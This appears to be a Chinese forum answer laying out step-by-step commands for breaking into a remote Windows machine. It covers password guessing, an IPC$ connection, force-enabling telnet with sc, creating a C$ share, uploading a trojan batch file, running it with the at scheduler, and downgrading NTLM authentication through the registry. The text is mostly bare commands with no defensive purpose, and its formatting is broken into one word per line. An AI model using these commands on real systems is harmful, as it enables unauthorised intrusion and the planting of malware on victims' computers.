发布网友 发布时间:2022-04-23 17:53
共1个回答
热心网友 时间:2023-09-10 09:22
0、侦测远程机器口令
-
1、netuse命令建立IPC连接
net
use
\IP
password
/user:administrator
用sc命令把禁用的telnet服务变成自动
sc
\IP
config
tlntsvr
start=
auto
2、用sc命令将telnet启动
sc
\IP
start
tlntsvr
3、net
share
建立c$共享
net
share
sharename=drive:path
4、copy命令上传木马
copy
a.bat
\192.168.0.1c$
5、at命令定时执行
at
\192.168.0.1
time
cmd
注意:如果对方采用了NTLM认证策略,可以连接网络注册表修改HKEYLOCAL
MACHINESOFTWAREMICROSOFTTELNETSERVER1.0下的NTLM键值由2改为0。
然后重新启动telnet服务。
6、用sc命令将telnet关闭
sc
\IP
stop
tlntsvr
--7、用sc命令将telnet启动
sc
\IP
start
tlntsvr